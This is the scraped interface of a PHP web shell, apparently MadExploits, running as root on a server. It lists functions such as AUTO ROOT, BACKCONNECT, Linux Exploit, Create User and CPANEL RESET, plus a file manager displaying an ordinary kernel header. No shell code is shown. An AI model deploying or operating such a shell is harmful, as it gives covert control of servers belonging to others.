Linux r-1tbfree-gecko-e8ip2zsa-2f967-wvg4t 6.12.63-84.121.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Dec 31 02:07:30 UTC 2025 x86_64
PHP/8.5.2 (Development Server)
: | : 10.16.21.217
Cant Read [ /etc/named.conf ]
8.5.2
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
misc /
[ HOME SHELL ]
Name
Size
Permission
Action
uacce
[ DIR ]
drwxr-xr-x
cxl.h
3.84
KB
-rw-r--r--
fastrpc.h
4.31
KB
-rw-r--r--
mrvl_cn10k_dpi.h
972
B
-rw-r--r--
ocxl.h
1.9
KB
-rw-r--r--
pvpanic.h
272
B
-rw-r--r--
xilinx_sdfec.h
12.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mrvl_cn10k_dpi.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ /* * Marvell Octeon CN10K DPI driver * * Copyright (C) 2024 Marvell. * */ #ifndef __MRVL_CN10K_DPI_H__ #define __MRVL_CN10K_DPI_H__ #include <linux/types.h> #define DPI_MAX_ENGINES 6 struct dpi_mps_mrrs_cfg { __u16 max_read_req_sz; /* Max read request size */ __u16 max_payload_sz; /* Max payload size */ __u16 port; /* Ebus port */ __u16 reserved; /* Reserved */ }; struct dpi_engine_cfg { __u64 fifo_mask; /* FIFO size mask in KBytes */ __u16 molr[DPI_MAX_ENGINES]; /* Max outstanding load requests */ __u16 update_molr; /* '1' to update engine MOLR */ __u16 reserved; /* Reserved */ }; /* DPI ioctl numbers */ #define DPI_MAGIC_NUM 0xB8 /* Set MPS & MRRS parameters */ #define DPI_MPS_MRRS_CFG _IOW(DPI_MAGIC_NUM, 1, struct dpi_mps_mrrs_cfg) /* Set Engine FIFO configuration */ #define DPI_ENGINE_CFG _IOW(DPI_MAGIC_NUM, 2, struct dpi_engine_cfg) #endif /* __MRVL_CN10K_DPI_H__ */
Close